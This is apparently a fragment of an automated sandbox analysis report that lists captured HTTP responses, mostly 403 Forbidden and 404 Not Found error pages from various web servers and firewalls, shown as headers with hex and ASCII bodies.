                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:44:40 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: wiTpd0AE/10pcSNi3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:41 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:44:49 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:41 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:41 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:42 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8bU%2FM2gusmNBcES7eclkNDpiFhGykN9zKC%2F7eI4a09l9zlDq7cTedVxgLMKZ%2BE9DdQVhpjPyPHaMlEy5BmKBwvE2sVm%2FhoGaBnYp3%2Bj1zpJidyq0SQEiLGcOT%2FJ7CGM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7e98f782c1e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QQM861Lte8CFxXfwtCYC5Xh%2BaoSSNCZ8AVTrc7sv6oF4uCff72Rt2RVGDNLosurX5AUwr9RlpsEgwvK6Yg7H6aP%2Fqc6m5cfSM%2BZPqvxrUVGCaolStr2YD0gIMmNs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7ee6d7f366e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 Data Ascii: 1be7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:42 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 